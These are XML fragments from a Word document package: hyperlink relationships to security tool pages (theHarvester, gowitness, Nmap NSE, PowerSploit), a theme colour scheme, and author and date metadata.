Target="https://www.kali.org/tools/theharvest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ensepost/gowitness" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/nse.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit"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Metropolitan">
  <a:themeElements>
    <a:clrScheme name="Custom 1">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="162F33"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EAF0E0"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="56018D"/>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22FAB-7DC8-4537-A911-C8FF1F30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Von Tish</dc:creator>
  <cp:lastModifiedBy>Lindsay Von Tish</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2023-03-11T02:28:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-31T18:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-31T19:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>